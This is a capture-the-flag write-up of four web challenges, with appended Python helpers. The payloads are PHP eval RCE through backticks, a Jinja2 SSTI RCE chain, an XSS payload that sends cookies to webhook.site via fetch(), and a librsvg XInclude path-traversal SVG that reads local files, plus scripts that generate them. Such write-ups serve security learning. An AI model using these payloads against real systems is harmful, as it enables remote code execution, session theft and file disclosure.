# Description

HCS (Heroes Cyber Security), the official cybersecurity team of Institut Teknologi Sepuluh Nopember, participated in UNbreakable International 2024 - Team Phase CTF. We finished 2nd out of 341 teams. Thanks to @daffainfo, @kerupuksambel, and @iktaS, who solved the challenges together with me. Note that every challenge we solved was fully black-box; even so, we managed to complete all the Web Exploitation challenges.

[toc]

# get-poc

> Can you get a working POC for this vulnerability? Flag format: ctf{sha256sum}

## Description

The `poc` parameter of the GET request is passed to `eval()`, which gives Remote Code Execution; we use it to read the flag.

## Solve

When we visit the website, we get this page.

![getpoc1](https://hackmd.io/_uploads/BJo5cbexR.png)

The page hints at `missing poc in get`, so we start by supplying that parameter.

![getpoc2](https://hackmd.io/_uploads/HJ_A5Wgg0.png)

The website responds like this.

![getpoc3](https://hackmd.io/_uploads/rkJ-sZlgR.png)

From the response we conclude that the parameter is being passed to `eval`, so we only need to call a command-execution function to get RCE.

![getpoc4](https://hackmd.io/_uploads/Sky_ibegC.png)

Unfortunately, PHP's `system` function is disabled. We then found the [PHP Execution Operator](https://www.php.net/manual/en/language.operators.execution.php) page in the manual: text enclosed in backticks is executed as a shell command. The operator is not a function name, so `disable_functions=system` does not block it; note, however, that it is implemented through `shell_exec()`, and the manual states that it is disabled whenever `shell_exec()` is. We try again with backticks.

![getpoc5](https://hackmd.io/_uploads/HyhZhbxe0.png)

We successfully get RCE and read the flag.

![getpocflag](https://hackmd.io/_uploads/SkiQ2-xlA.png)

```
ctf{6d4e8ef22eb3448e8655571e8b769f15fdef4fb4cfb0d108eb38664c96005c89}
```

# bad-dev

> Get the flag.

## Description

SSTI in the form leads to RCE, and we read the flag.

## Solve

When I first looked at the website, it felt like an `SSTI` case because the application runs on Flask.

![badev1](https://hackmd.io/_uploads/S1VbpblgC.png)

We visit the website and submit some text through the form.
![badev2](https://hackmd.io/_uploads/BJ3Va-lg0.png)

We change the value of the parameter to a template arithmetic expression to check whether it is vulnerable to SSTI.

![badev3](https://hackmd.io/_uploads/H1cYp-elC.png)

The result is `49`: the expression was evaluated server-side, as suspected, so we can move straight to RCE with one of the Jinja2 [SSTI payloads](https://github.com/payloadbox/ssti-payloads).

![badev4](https://hackmd.io/_uploads/Bk5AaZgxC.png)

We successfully get RCE and read the flag.

![badevflag](https://hackmd.io/_uploads/BJUxCZxlA.png)

```
CTF{4e86532c1b513931d809f9ad01baa4290c8449c4db9628b8ba5b23dbbb932db8}
```

# xfit

> Picture this: within the vast expanse of the digital realm, lies a crucial secret vault—a clandestine cache known as cookies. But beware, for these digital treasures are not scattered haphazardly. No, they are meticulously guarded within the confines of their respective domains, each one a sentinel of its cyber kingdom. It's a thrilling saga of hidden treasures and guarded gateways, where the very essence of your online identity hangs in the balance!

## Description

SSRF plus blind XSS through the contact form; we exfiltrate the bot's cookie and get the flag.

## Solve

We are given a website with a contact form.

![fit1](https://hackmd.io/_uploads/SkJybGlgA.png)

We test it by submitting a `webhook` URL to check whether the backend fetches it, i.e. whether it is vulnerable to SSRF.

![fit2](https://hackmd.io/_uploads/SkeGbfle0.png)

The webhook receives a request, so the form is vulnerable to SSRF.

![fit3](https://hackmd.io/_uploads/rJca4Gxe0.png)

Next we try to send the cookie to the webhook with an `<img>` payload (the `+` signs are form-encoded spaces).

```html=1
<img+src+onerror="fetch('http://webhook.site/999ba582-fb82-4953-84b7-78fb0091002a?'+document.cookie)">
```

![fit4](https://hackmd.io/_uploads/HkzyHzeeR.png)

But the cookie value that arrived was empty. `document.cookie` only exposes cookies belonging to the origin the script runs in, so the payload has to execute on the challenge's own host rather than on a page we control.

![fit5](https://hackmd.io/_uploads/SJKISzlxR.png)

We then notice an endpoint like this, `error.html`, which reflects its `err` parameter.

![fit6](https://hackmd.io/_uploads/H1EdBGxlC.png)

We inject a test payload into it, and it is vulnerable to reflected XSS.

![fit7](https://hackmd.io/_uploads/ryZcHfxx0.png)

We go back to the contact form and submit the following URL for the bot to open, with the `err` value URL-encoded twice.
```
http://localhost/error.html?err=403%2527%2522%253E%253Cimg%2520src%2520onerror=%2522fetch(%2527https://webhook.site/999ba582-fb82-4953-84b7-78fb0091002a?%2527%252bdocument.cookie)%2522%253E
```

![fit8](https://hackmd.io/_uploads/SJU6rGelA.png)

And we get the flag.

![fitflag](https://hackmd.io/_uploads/SJMZ8GexA.png)

```
CTF{5a9f641002782d51bdc46a22bb013cf0fd14ee5a6a094bb39a946806a0a1cf08}
```

# profile-pic

> Can you change my profile picture in a hacker way? Flag format: ctf{sha256sum}

## Description

Exploiting CVE-2023-38633 (XInclude path traversal in librsvg) gives arbitrary file read, which we use to read the flag.

## Solve

We get a website that simply asks us to upload a file.

![profile1](https://hackmd.io/_uploads/HJqi5QlxA.png)

This is what happens when I try to upload a PHP file.

![profile2](https://hackmd.io/_uploads/BJZaqQxgC.png)

After some recon we found this article on [CVE-2023-38633](https://www.canva.dev/blog/engineering/when-url-parsers-disagree-cve-2023-38633/): the URL parser librsvg uses for its same-directory check and the loader that actually opens the file disagree about an `href` beginning with `.?../`, so the check passes while the loader follows the traversal, and an `<xi:include>` inside an uploaded SVG can pull in arbitrary local files as text. The `svg` payload that reads `/etc/passwd` looks like this:

```html=1
<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<svg width="300" height="300" xmlns:xi="http://www.w3.org/2001/XInclude">
<rect width="300" height="300" style="fill:rgb(255,204,204);" />
<text x="0" y="100">
<xi:include href=".?../../../../../../../etc/passwd" parse="text" encoding="ASCII" >
<xi:fallback>file not found</xi:fallback>
</xi:include>
</text>
</svg>
```

Since the upload form limits images to 50 pixels, we set the size on line `2` to 50x50 and change the path to `/var/www/html/flag.php`. The final payload:

```html=1
<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<svg width="50px" height="50px" xmlns:xi="http://www.w3.org/2001/XInclude">
<rect width="1300" height="300" style="fill:rgb(255,204,204);" />
<text x="-100" y="25" font-size="0.7em">
<xi:include href=".?../../../../../../../var/www/html/flag.php" parse="text" encoding="ASCII" >
<xi:fallback>file not found</xi:fallback>
</xi:include>
</text>
</svg>
```

This renders the first half of the flag.
![profileflag](https://hackmd.io/_uploads/B1tghXglA.png)

Because of the pixel limit only a window of the included text fits in the rendered image, so we shift the `x` attribute on line `4` to `-150`, `-200`, `-250`, and so on, reading the rest of the flag one window at a time. Assembling the pieces gives the final flag.

```
ctf{af0a742b17dd73ca3d8ff27c885350a890c4ab104670fa3373de63c7709925b0}
```
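For the get-poc challenge above, the step a practitioner would add before trial and error is to ask PHP which functions are blocked, then try every execution primitive in one pass and let the markers in the response tell you which ones ran. The following is an added example, not code from the write-up: the HTTP transport is abstracted behind a `send` callable, and `FakeEvalSink` is a constructed stand-in for the challenge's `eval()` sink that assumes `disable_functions=system` (the real configuration was never visible), so everything runs offline.

```python
import re
from urllib.parse import urlencode

MARKER = "@@hcs@@"  # delimits our output inside whatever HTML the page wraps it in

# PHP snippets that run `id` through different execution primitives.
PRIMITIVES = {
    "system": "system('id');",
    "shell_exec": "echo shell_exec('id');",
    "passthru": "passthru('id');",
    "backtick": "echo `id`;",
}


def build_poc(php: str) -> str:
    """Wrap a PHP snippet so its output sits between two MARKERs in the page."""
    return f'echo "{MARKER}";{php}echo "{MARKER}";'


def as_query_string(php: str) -> str:
    """The ?poc=... form that would be appended to the challenge URL."""
    return "?" + urlencode({"poc": build_poc(php)})


def extract(body: str):
    """Pull the text between the two markers out of the HTML response."""
    m = re.search(re.escape(MARKER) + r"(.*?)" + re.escape(MARKER), body, re.S)
    return m.group(1) if m else None


def read_disable_functions(send) -> set:
    """Step 1: ask PHP which functions are blocked instead of guessing."""
    out = extract(send(build_poc('echo ini_get("disable_functions");'))) or ""
    return {f.strip() for f in out.split(",") if f.strip()}


def find_working_primitives(send) -> dict:
    """Step 2: try each primitive and record which ones return `id` output."""
    return {
        name: "uid=" in (extract(send(build_poc(php))) or "")
        for name, php in PRIMITIVES.items()
    }


class FakeEvalSink:
    """Constructed stand-in for the challenge: answers the exact snippets above
    the way a PHP eval() sink would under the given disable_functions list.
    The real challenge's configuration is unknown; system-only is an assumption."""

    ID_OUTPUT = "uid=33(www-data) gid=33(www-data) groups=33(www-data)\n"

    def __init__(self, disabled=("system",)):
        self.disabled = set(disabled)

    def _run(self, php: str) -> str:
        if php == 'echo ini_get("disable_functions");':
            return ",".join(sorted(self.disabled))
        m = re.fullmatch(r"(?:echo )?(\w+)\('id'\);", php)
        if m:
            fn = m.group(1)
            if fn in self.disabled:
                return f"Warning: {fn}() has been disabled for security reasons"
            return self.ID_OUTPUT
        if php == "echo `id`;":
            # Backticks are shell_exec() in disguise: the PHP manual notes the
            # operator is disabled exactly when shell_exec() is.
            if "shell_exec" in self.disabled:
                return "Warning: shell_exec() has been disabled for security reasons"
            return self.ID_OUTPUT
        return "Parse error: syntax error"

    def send(self, poc: str) -> str:
        wrap = f'echo "{MARKER}";'
        if poc.startswith(wrap) and poc.endswith(wrap):
            inner = poc[len(wrap):-len(wrap)]
            return f"<html><body>{MARKER}{self._run(inner)}{MARKER}</body></html>"
        return f"<html><body>{self._run(poc)}</body></html>"


if __name__ == "__main__":
    sink = FakeEvalSink()
    print("disable_functions:", read_disable_functions(sink.send))
    print("working primitives:", find_working_primitives(sink.send))
```

Against the real target, `send` would be something like `lambda poc: requests.get(URL, params={"poc": poc}).text`. The backtick case carries the caveat from the manual: it succeeds only because `shell_exec()` is not on the list, so a sink that also disables `shell_exec` reports the backtick probe as failed.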
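For the bad-dev challenge, the `49` that came back is the first branch of the usual engine-fingerprinting tree: a product that only a template engine would compute, followed by a probe whose result differs between engines that share the `{{ }}` syntax. The following is an added example, not code from the write-up: `fingerprint` drives any `send` callable, `FakeJinja2Form` and `FakeSafeForm` are constructed stand-ins (one evaluates the arithmetic probes with Jinja2's Python semantics, the other HTML-escapes input), and the RCE payload is the standard `self.__init__.__globals__` chain for Jinja2, not the specific payload used during the CTF.

```python
import html
import re


def evaluates(send, probe: str, expected: str) -> bool:
    """True when the engine computed `probe`: the expected value is present
    and the raw probe is absent, which rules out plain reflection."""
    body = send(probe)
    return expected in body and probe not in body


def fingerprint(send):
    """Classify the engine behind an injection point, or None if no SSTI."""
    # 1337*1337 is far less likely than 49 to appear on the page by chance.
    if evaluates(send, "{{1337*1337}}", "1787569"):
        # Jinja2 multiplies str by int; Twig (PHP) coerces '7' to 7 and gives 49.
        if evaluates(send, "{{7*'7'}}", "7777777"):
            return "Jinja2"
        if evaluates(send, "{{7*'7'}}", "49"):
            return "Twig"
        return "unknown {{ }} engine"
    if evaluates(send, "${1337*1337}", "1787569"):
        return "${} engine (Mako / FreeMarker / Velocity family)"
    if evaluates(send, "<%= 1337*1337 %>", "1787569"):
        return "ERB"
    return None


def jinja2_rce_payload(cmd: str) -> str:
    """Command execution once Jinja2 is confirmed: walk from the template
    object to __builtins__ and import os. `cmd` must not contain single quotes."""
    return ("{{self.__init__.__globals__.__builtins__.__import__('os')"
            f".popen('{cmd}').read()}}}}")


class FakeJinja2Form:
    """Constructed stand-in for the vulnerable Flask form: renders the input
    with Jinja2-like semantics for the small arithmetic probes used above."""

    def send(self, text: str) -> str:
        def evaluate(m):
            expr = re.fullmatch(r"\s*(\d+)\s*\*\s*(?:'(\d+)'|(\d+))\s*", m.group(1))
            if not expr:
                return ""  # Jinja2 would raise; not needed for the probes
            left, quoted, plain = expr.groups()
            if quoted is not None:
                return quoted * int(left)  # Python: 7 * '7' -> '7777777'
            return str(int(left) * int(plain))

        rendered = re.sub(r"\{\{(.*?)\}\}", evaluate, text)
        return f"<p>Hello {rendered}!</p>"


class FakeSafeForm:
    """The same page with the input HTML-escaped and never fed to the engine."""

    def send(self, text: str) -> str:
        return f"<p>Hello {html.escape(text)}!</p>"


if __name__ == "__main__":
    print("vulnerable form:", fingerprint(FakeJinja2Form().send))
    print("safe form:", fingerprint(FakeSafeForm().send))
    print(jinja2_rce_payload("id"))
```

The fix on the application side is the usual one: never pass user input to `render_template_string` (or `Template(...)`) as the template itself; put it in the context and let a file template render it.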
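For the xfit challenge, the part that is easy to get wrong by hand is the double URL-encoding of the reflected `err` value. The following is an added example, not code from the write-up: it builds the cookie-stealing payload, encodes it twice, and then walks it back through the two decode steps the write-up implies. Which component strips which layer was not visible from the black box; the example assumes one layer is removed when `err` is parsed out of the query string and the other when `error.html` reflects the value, and the webhook URL is a placeholder.

```python
from urllib.parse import parse_qs, quote, unquote, urlsplit

# Placeholder listener (assumption); use your own webhook.site or interactsh URL.
WEBHOOK = "https://webhook.site/00000000-0000-0000-0000-000000000000"


def cookie_stealer(webhook: str) -> str:
    """Break out of a quoted attribute, then add an <img> whose empty src makes
    onerror fire at once and ship document.cookie to the listener."""
    return "'\"><img src onerror=\"fetch('" + webhook + "?'+document.cookie)\">"


def double_encode(value: str) -> str:
    """Percent-encode twice so that after two decode steps the raw payload
    lands in the page. safe="" encodes '/', ':' and '?' as well, which is
    more than the write-up's payload does but decodes identically."""
    return quote(quote(value, safe=""), safe="")


def bot_url(webhook: str, host: str = "http://localhost") -> str:
    """The URL submitted through the contact form for the bot to open.
    '403' mimics the status text the page normally shows before the injection."""
    return f"{host}/error.html?err={double_encode('403' + cookie_stealer(webhook))}"


def err_after_query_parse(url: str) -> str:
    """First decode layer: the value of `err` once the query string is parsed."""
    return parse_qs(urlsplit(url).query)["err"][0]


def err_after_reflection(err_once: str) -> str:
    """Second decode layer: what error.html writes into the DOM."""
    return unquote(err_once)


if __name__ == "__main__":
    url = bot_url(WEBHOOK)
    print(url)
    print(err_after_reflection(err_after_query_parse(url)))
```

The two helper decoders double as a sanity check: if the fully decoded string is not byte-for-byte the payload you intended, the encoding depth is wrong for that sink, and the request will either reflect harmless percent-sequences or never reach the bot.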
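For the profile-pic challenge, reading a file through a 50-pixel image means generating the same SVG repeatedly with a different `x` offset, which is tedious by hand and easy to break. The following is an added example, not code from the write-up: it generates the XInclude payload for any path and offset (the same `.?../` traversal depth and element layout as the payload above), emits the series of windows the write-up steps through, and parses each result back to confirm it is well-formed before upload. `write_payloads` and the file names are this example's own.

```python
import os
import xml.etree.ElementTree as ET

XI_NS = "http://www.w3.org/2001/XInclude"
TRAVERSAL_DEPTH = 7  # number of ../ segments in the write-up's payload


def xinclude_href(path: str) -> str:
    """Build the '.?../../..' href: the '.?' prefix is what makes librsvg's
    same-directory check and its file loader disagree (CVE-2023-38633)."""
    return ".?" + "../" * TRAVERSAL_DEPTH + path.lstrip("/")


def xinclude_svg(path: str, x_offset: int, size: int = 50,
                 font_size: str = "0.7em") -> str:
    """A size x size SVG whose <text> pulls `path` in through XInclude.
    Moving x_offset further left scrolls the included text across the canvas."""
    return f'''<?xml version="1.0" encoding="UTF-8" standalone="no" ?>
<svg width="{size}px" height="{size}px" xmlns:xi="{XI_NS}">
<rect width="1300" height="300" style="fill:rgb(255,204,204);" />
<text x="{x_offset}" y="25" font-size="{font_size}">
<xi:include href="{xinclude_href(path)}" parse="text" encoding="ASCII">
<xi:fallback>file not found</xi:fallback>
</xi:include>
</text>
</svg>
'''


def sliding_payloads(path: str, start: int = -100, step: int = -50,
                     count: int = 4):
    """One (offset, svg) pair per window, as in the write-up (-100, -150, ...)."""
    return [(start + i * step, xinclude_svg(path, start + i * step))
            for i in range(count)]


def included_href(svg_text: str):
    """Parse the SVG back and return the XInclude href; raises on malformed
    XML, so it doubles as a pre-upload well-formedness check."""
    root = ET.fromstring(svg_text.encode("utf-8"))
    inc = root.find(f".//{{{XI_NS}}}include")
    return None if inc is None else inc.get("href")


def write_payloads(path: str, out_dir: str = ".") -> list:
    """Write one ready-to-upload flag_<offset>.svg per window; returns the names."""
    names = []
    for offset, svg in sliding_payloads(path):
        included_href(svg)  # fail early if the XML is broken
        name = os.path.join(out_dir, f"flag_{abs(offset)}.svg")
        with open(name, "w", encoding="utf-8") as fh:
            fh.write(svg)
        names.append(name)
    return names


if __name__ == "__main__":
    for name in write_payloads("/var/www/html/flag.php"):
        print("wrote", name)
```

Upload the files in order and transcribe each rendered window; if the text is clipped at the top or bottom, adjust `y` or `font_size` rather than the traversal.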